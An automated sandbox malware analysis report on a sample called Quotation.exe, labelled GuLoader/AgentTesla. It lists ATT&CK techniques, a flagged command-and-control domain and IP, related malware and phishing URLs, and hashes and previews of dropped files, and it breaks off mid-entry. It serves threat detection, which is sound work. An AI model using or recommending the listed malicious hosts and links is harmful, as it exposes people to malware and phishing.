Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	11 Input Capture	225 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	1 DLL Side-Loading	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	311 Security Software Discovery	Distributed Component Object Model	11 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation.exe	66%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://showpiece.trillennium.biz	0%	Avira URL Cloud	safe
http://mail.showpiece.trillennium.biz	0%	Avira URL Cloud	safe
http://x1.i.len	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.78	true	false	high
drive.usercontent.google.com	172.217.18.1	true	false	high
api.ipify.org	172.67.74.152	true	false	high
showpiece.trillennium.biz	67.23.226.139	true	true	unknown
mail.showpiece.trillennium.biz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://showpiece.trillennium.biz	Quotation.exe, 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/;	Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802098526.000000003A38B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.showpiece.trillennium.biz	Quotation.exe, 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Quotation.exe, 00000006.00000003.2506545881.0000000007C89000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2780628654.0000000007C72000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error...	Quotation.exe, 00000000.00000000.1529758782.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000006.00000000.2328570673.0000000000408000.00000002.00000001.01000000.00000003.sdmp	false		high
https://api.ipify.org/t	Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.len	Quotation.exe, 00000006.00000003.2574356823.000000003A3AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/C	Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmp	false		high
http://r11.i.lencr.org/0	Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802098526.000000003A38B000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	drive.google.com	United States	15169	GOOGLEUS	false
67.23.226.139	showpiece.trillennium.biz	United States	33182	DIMENOCUS	true
172.217.18.1	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1553547
Start date and time:	2024-11-11 11:47:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quotation.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/12@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 148 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Quotation.exe

Simulations

Behavior and APIs

Time	Type	Description
05:50:12	API Interceptor	208x Sleep call for process: Quotation.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
67.23.226.139	3Pd480eWHA.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quotation.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Revised PI 28 08 2024.exe	Get hash	malicious	AgentTesla	Browse
	PI 22_8_2024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	COTIZACION 19 08 24.exe	Get hash	malicious	AgentTesla	Browse
	pago.exe	Get hash	malicious	AgentTesla	Browse
172.67.74.152	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Creal.exe	Get hash	malicious	Creal Stealer	Browse	104.26.13.205
	#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe	Get hash	malicious	Blank Grabber, Creal Stealer	Browse	104.26.12.205
	ypauPrrA08.exe	Get hash	malicious	Ades Stealer, BlackGuard, VEGA Stealer	Browse	104.26.13.205
	Sara.exe.bin.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	Sara.exe.bin.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	6G1YhrEmQu.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	pago de PEDIDO PROFORMA.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://thrifty-wombat-mjszmd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.12.205
	TtyCIqbov8.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIMENOCUS	hiss.mpsl.elf	Get hash	malicious	Unknown	Browse	198.136.58.114
	Updated Document-9875488675.pdf	Get hash	malicious	Captcha Phish	Browse	67.23.254.53
	3Pd480eWHA.exe	Get hash	malicious	AgentTesla	Browse	67.23.226.139
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	Quotation.exe	Get hash	malicious	AgentTesla	Browse	67.23.226.139
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br	Get hash	malicious	HTMLPhisher	Browse	107.161.183.172
	http://prabal-gupta-lcatterton-com.athuselevadores.com.br/	Get hash	malicious	HTMLPhisher	Browse	107.161.183.172
CLOUDFLARENETUS	https://url.uk.m.mimecastprotect.com/s/kDIoCE937cZ18nFwhvH7E_ay?domain=eye.sbc31.net	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Scan112024.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	DHL 984468477.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Consulta de encomenda N#U00ba TM06-Q2-11-24.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exe	Get hash	malicious	FormBook	Browse	172.67.177.220
	SAFAIR - MDE_File_Sample_c4fda6eee21550785a1c89ce291a2d3072e0ed9b.zip	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	DDH_LP (1).exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	seethebstpricewithbestthinghappingwithgoodnews.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	172.67.74.152
	seethebestthingsneedtodowithgreatthingshappenedonheretosee.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	172.67.74.152
	DDH_LP (1).exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	Scan112024.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	Request for Quotation 11-11-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.74.152
	074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.74.152
	Consulta de encomenda N#U00ba TM06-Q2-11-24.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	Intesa.Sanpaolo.Pagamento.pdf.exe	Get hash	malicious	Remcos	Browse	172.67.74.152
	ORDER#73672-MAT373674849083403894808434PDF.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
37f463bf4616ecd445d4a1937da06e19	Request for Quotation 11-11-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	142.250.186.78 172.217.18.1
	074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	142.250.186.78 172.217.18.1
	rPO3799039985.exe	Get hash	malicious	Remcos, GuLoader	Browse	142.250.186.78 172.217.18.1
	Rechnung_10401.js	Get hash	malicious	ScreenConnect Tool	Browse	142.250.186.78 172.217.18.1
	A322mb7u3h.exe	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.18.1
	C6y77dS3l7.exe	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.18.1
	Wiu8X6685m.exe	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.18.1
	WUa1Tm8Dlv.exe	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.18.1
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse	142.250.186.78 172.217.18.1
	AcroCEF.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.186.78 172.217.18.1

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quotation.exe	Get hash	malicious	AgentTesla	Browse
	1364. 2024.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quote_220072.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.97694153396788
Encrypted:	false
SSDEEP:	192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
MD5:	D6F54D2CEFDF58836805796F55BFC846
SHA1:	B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
SHA-256:	F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
SHA-512:	CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Quotation.exe, Detection: malicious, Browse Filename: COTIZACION.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: 1364. 2024.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: Quote_220072.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Music\antithetic.ini

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.264578373902383
Encrypted:	false
SSDEEP:	3:apWPWPjNLCNHiy:UPRCNHiy
MD5:	58AC0B5E1D49D0EE1AED2FE13FAE6C7A
SHA1:	02C8384573D47CA39F2E2ACA32B275861EC59A93
SHA-256:	624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
SHA-512:	8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[broadspread]..slyngvrk=houghband..

C:\Users\user\overlays\besvangredes\Emmens.udk

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	482519
Entropy (8bit):	1.2446382063037653
Encrypted:	false
SSDEEP:	1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
MD5:	1D099F6122F4B7C8A78925726B59E5C3
SHA1:	EEA154E31FF04CD1A2CED0193F7633ED219CFA47
SHA-256:	1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
SHA-512:	F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........

C:\Users\user\overlays\besvangredes\Konditorierne\Trikstanks.pra

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	340974
Entropy (8bit):	1.254605943274635
Encrypted:	false
SSDEEP:	768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
MD5:	49BE0E06F2E4F0CCFFB46426EE262642
SHA1:	FF9C56C31A824E4CA087705C23D01D288FE34239
SHA-256:	A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
SHA-512:	27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................\|. .....

C:\Users\user\overlays\besvangredes\Konditorierne\boyaus.rom

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	392462
Entropy (8bit):	1.241128723454179
Encrypted:	false
SSDEEP:	768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
MD5:	F130EC3095DBECEDC791D8C58A59040C
SHA1:	DAD2300B487F31F199520E1B41AB02B7D677B352
SHA-256:	A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
SHA-512:	8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
Malicious:	false
Preview:	..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................

C:\Users\user\overlays\besvangredes\Konditorierne\gear.dra

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	433786
Entropy (8bit):	1.255949132332751
Encrypted:	false
SSDEEP:	768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
MD5:	53FF1A157920AE92C9BF891D453D6B65
SHA1:	B7BF3B7B16048F38132D8ACCA841130D73DB44C3
SHA-256:	FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
SHA-512:	E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
Malicious:	false
Preview:	......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................

C:\Users\user\overlays\besvangredes\Konditorierne\jagtfalk.ill

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	374902
Entropy (8bit):	1.250991222921627
Encrypted:	false
SSDEEP:	1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
MD5:	169115C751DDA5E021E8C86E8454B26D
SHA1:	5A8254634C0C726BB18E42E626EAEB581D532DCD
SHA-256:	ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
SHA-512:	2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
Malicious:	false
Preview:	.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........

C:\Users\user\overlays\besvangredes\Konditorierne\regill.ful

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	489048
Entropy (8bit):	1.245615736901525
Encrypted:	false
SSDEEP:	1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
MD5:	B4FB425BAF217F31E91AAB39ABF66DCD
SHA1:	03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
SHA-256:	4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
SHA-512:	E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
Malicious:	false
Preview:	.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^.......................................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`.............................)1.............q..............4....

C:\Users\user\overlays\besvangredes\Konditorierne\sortlistningens.txt

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	4.247837387326688
Encrypted:	false
SSDEEP:	6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
MD5:	46003C65AA12A0EBE55662F0141186DC
SHA1:	739652C3375018DAFFB986302A7D3E8D32770B41
SHA-256:	2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
SHA-512:	59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
Malicious:	false
Preview:	degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..

C:\Users\user\overlays\besvangredes\Modernized.Fil

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	371283
Entropy (8bit):	7.672637395473041
Encrypted:	false
SSDEEP:	6144:B0DsdxHOonHNzzc7TH8eLNpzi7EXXLNwk5ZdloCV1PA4AZ2mvDq:Kyxt48eLLi2lllrPA48/O
MD5:	D22E3279808203240637B86177A5923E
SHA1:	95F285E86FDD84BBA740BFCEED2A8B1FFFD38C90
SHA-256:	C5357EAD0E6BE3B4632516BCA653EDF8EDC122C368F80BBECD7317801FCDFAA8
SHA-512:	A3AD08B814568466AF4AE38ED952C2BE0090827E88DE9C264A78AEDA2FF06F44BE81B79423C3E1F79DC007F58A230340190E0AAD5874C8426E966E33ABCF9C0F
Malicious:	false
Preview:	......AA......55....).............gg...............................................~~~~~...\|\|................```..................!!!!.A...............<.............T............q................................tttt..+................................ddd.AA......'aoE...?K.=S..2t..x..j.e.3.4lN.U.u...A......2...Z@..z.. .qsk.:[..TP.n\|S.\..X..`...BC..1...,.f..f......=.y[.......>....6.M.+..Iq=....h.!.].....E.....(..P.D..m....f......0......g.LiV...QY.../\|.<.~J....&..r......p..H..=..<U.....*..Gy.#.'.......b...WH.$.vc..9.f...)...........#df^w......OaoE...?K.=S..2t..x..j.e..Q.T..f....B3.4lN.U.u...A....Z@..z.. .qsk.:[..TP.n\|S.\..X..`...BC..1...,...........2y[.......>....6.M.+..Iq=....h.!.].....E.....(........@.P.D..m.}......g.LiV...QY.../\|.<.~J....&..r......p..H.._..Gy..\|..........'.......b...WH.$.vc..9.f...f......f.... ...7df^w......OaoE...?K.=S..2t ....q...F.x..j.e.3.4lN.U.u...A....Z@..z.. .qsk.:[..TP.n\|S.\..X..`...BC..1.....:T.f.q.....;,...y[......

C:\Users\user\overlays\besvangredes\Proprietrer.bet

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	288955
Entropy (8bit):	1.2577770955280814
Encrypted:	false
SSDEEP:	768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
